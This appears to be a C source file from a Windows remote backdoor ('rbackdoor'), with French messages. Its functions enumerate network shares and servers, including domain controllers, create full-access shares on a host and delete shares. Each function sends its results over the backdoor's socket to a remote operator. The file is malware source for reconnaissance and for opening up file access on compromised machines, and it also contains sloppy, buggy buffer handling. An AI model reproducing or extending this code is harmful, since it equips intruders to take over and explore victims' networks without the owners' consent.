#include "rbackdoor.h"

#define MAXLEN 256

int RShare_Enum(char *host)
{
	SHARE_INFO_2 *buf, *cur;
	DWORD read, total, resumeh, rc, i;
	wchar_t server[256];
	char tempstr[20], *type, *buffer;
	static char *types[] = { "disk", "printq", "device", "ipc" };
	
	
	buffer = (char *)GlobalAlloc(GPTR, 1024);
	
	if(strlen(host) < 1)
	{
		Proc_help("netshare");
		return(-1);
	}
	
	if (strlen(host) >= 1 )
		mbstowcs(server, host, 256);
	else server[0] = L'\0';
	
	resumeh = 0;
	do
	{
		buf = NULL;
		rc = NetShareEnum(strlen(host)>1?NULL: (unsigned char *)server, 2, (BYTE **) &buf,8192, &read, &total, &resumeh);
		
		sprintf(buffer, "=====================================\n => %lu Entrees sur %lu\n=====================================\n", read, total );
		rsend(ConnectSocket, buffer);
		
		
		for (i = 0, cur = buf; i < read; ++ i, ++ cur)
		{
			if ((cur->shi2_type & ~STYPE_SPECIAL) >= 0 && (cur->shi2_type & ~STYPE_SPECIAL) <= STYPE_IPC)
				type = types[(cur->shi2_type & ~STYPE_SPECIAL)];
			else
				sprintf(type = tempstr, "%08lx", cur->shi2_type);
			sprintf(buffer, " > %-20.20S     %-8.8s%c     %-.100S\n", cur->shi2_netname, type, (cur->shi2_type & STYPE_SPECIAL)? '*': ' ',cur->shi2_path);
			rsend(ConnectSocket, buffer);
		}
		
		if (buf != NULL)
			NetApiBufferFree(buf);
		
	} while (rc == ERROR_MORE_DATA);
	
	GlobalFree(buffer);
	return(0);
}

char *AsWideString(const char *cszANSIstring)
{
	int nBufSize;
	WCHAR *wideString;

	if(cszANSIstring == NULL)
	{
		return NULL;
	}

	nBufSize = MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, cszANSIstring, -1, NULL, 0 );
	wideString = (WCHAR *)malloc(nBufSize +1);
	MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, cszANSIstring, -1, wideString, nBufSize);
	return (char*)(wideString);
}

int RShareAdd(char *host, const char *dir_path, const char *net_name, const char *password)
{
	NET_API_STATUS nCallResult;
	SHARE_INFO_2	shareinfo;
	DWORD dwErrArg;

	if(strlen(host) < 1 || strlen(dir_path) < 1 || strlen(net_name) < 1)
	{
		Proc_help("addshare");
		return(-1);
	}
	
    shareinfo.shi2_netname = AsWideString(net_name);
    shareinfo.shi2_type = STYPE_DISKTREE;
	shareinfo.shi2_remark = AsWideString("RSHARE");
	shareinfo.shi2_max_uses = (unsigned long)(-1);
	shareinfo.shi2_current_uses = 0;
	shareinfo.shi2_path = AsWideString(dir_path);
	shareinfo.shi2_permissions = ACCESS_ALL;
	shareinfo.shi2_passwd = AsWideString(password);

	nCallResult = NetShareAdd(AsWideString(host), 2, (unsigned char *)(&shareinfo), &dwErrArg);
	if( nCallResult == NERR_Success )
	{
		rsend(ConnectSocket, "msg: Ressource partagee avec succes\n");
	}
	else {
		rsend(ConnectSocket, "Error: La ressource n'a pas ete partagee\n");
		return(-1);
	}
    
    return(0);
}

int RShareDel(char *host, const char* net_name)
{
	int nResult;
	char *wide_net_name;
	
	if(strlen(host) < 1 || strlen(net_name) < 1)
	{
		Proc_help("delshare");
		return(-1);
	}

	wide_net_name = AsWideString(net_name);
	nResult = NetShareDel(AsWideString(host),wide_net_name, 0);
	GlobalFree(wide_net_name);
	
	if(NERR_Success == nResult)
	{
		rsend(ConnectSocket, "msg: Ressource partagee efface avec succes\n");
	}
	else {
		rsend(ConnectSocket, "error: Erreur lors de la tentative de suppression de la ressource\n");
		return(-1);
	}
	return(0);
}

int RServerEnum(char *server)
{
   LPSERVER_INFO_101 pBuf = NULL;
   LPSERVER_INFO_101 pTmpBuf;
   DWORD dwLevel = 101;
   DWORD dwPrefMaxLen = 0xFFFFFFFF;
   DWORD dwEntriesRead = 0;
   DWORD dwTotalEntries = 0;
   DWORD dwTotalCount = 0;
   DWORD dwServerType = SV_TYPE_SERVER; // all servers
   DWORD dwResumeHandle = 0;
   NET_API_STATUS nStatus;
   LPTSTR pszServerName = NULL;
   DWORD i;
   char *buffer;

   if (strlen(server) < 2)
   {
      Proc_help("enumserver");
	  return(-1);
   }

   pszServerName = AsWideString(server);
  
   nStatus = NetServerEnum((unsigned short *)pszServerName, dwLevel, (LPBYTE *) &pBuf, dwPrefMaxLen, &dwEntriesRead,&dwTotalEntries, dwServerType,NULL,&dwResumeHandle);

   buffer = (char *)GlobalAlloc(GPTR, 1024);

   if ((nStatus == NERR_Success) || (nStatus == ERROR_MORE_DATA))
   {
      if ((pTmpBuf = pBuf) != NULL)
      {
         for (i = 0; i < dwEntriesRead; i++)
         {
            assert(pTmpBuf != NULL);

            if (pTmpBuf == NULL)
            {
			   rsend(ConnectSocket, "Error: An access violation has occurred\n");
               break;
            }

            sprintf(buffer, "\tPlatform: %d\n", pTmpBuf->sv101_platform_id);
			sprintf(buffer, "%s\tName:     %s\n", buffer, pTmpBuf->sv101_name);
            sprintf(buffer, "%s\tVersion:  %d.%d\n", buffer, pTmpBuf->sv101_version_major, pTmpBuf->sv101_version_minor);
            sprintf(buffer, "%s\tType:     %d", buffer, pTmpBuf->sv101_type);
            rsend(ConnectSocket, buffer);

            if (pTmpBuf->sv101_type & SV_TYPE_DOMAIN_CTRL)
               rsend(ConnectSocket, " (PDC)");
			   
            else if (pTmpBuf->sv101_type & SV_TYPE_DOMAIN_BAKCTRL)
               rsend(ConnectSocket, " (BDC)");
            
            rsend(ConnectSocket, "\n");

            sprintf(buffer ,"\tComment:  %s\n\n", pTmpBuf->sv101_comment);
			rsend(ConnectSocket, buffer);

            pTmpBuf++;
            dwTotalCount++;
         }

         if (nStatus == ERROR_MORE_DATA)
         {
            rsend(ConnectSocket, "\nMore entries available!!!\n");
            sprintf(buffer, "Total entries: %d", dwTotalEntries);
			rsend(ConnectSocket, buffer);
         }
         sprintf(buffer, "\nEntries enumerated: %d\n", dwTotalCount);
		 rsend(ConnectSocket, buffer);
      }
   }
   else
      sprintf(buffer, "Error: A system error has occurred: %d\n", nStatus);
      rsend(ConnectSocket, buffer);
   if (pBuf != NULL)
      NetApiBufferFree(pBuf);

   GlobalFree(buffer);
   return(0);
}

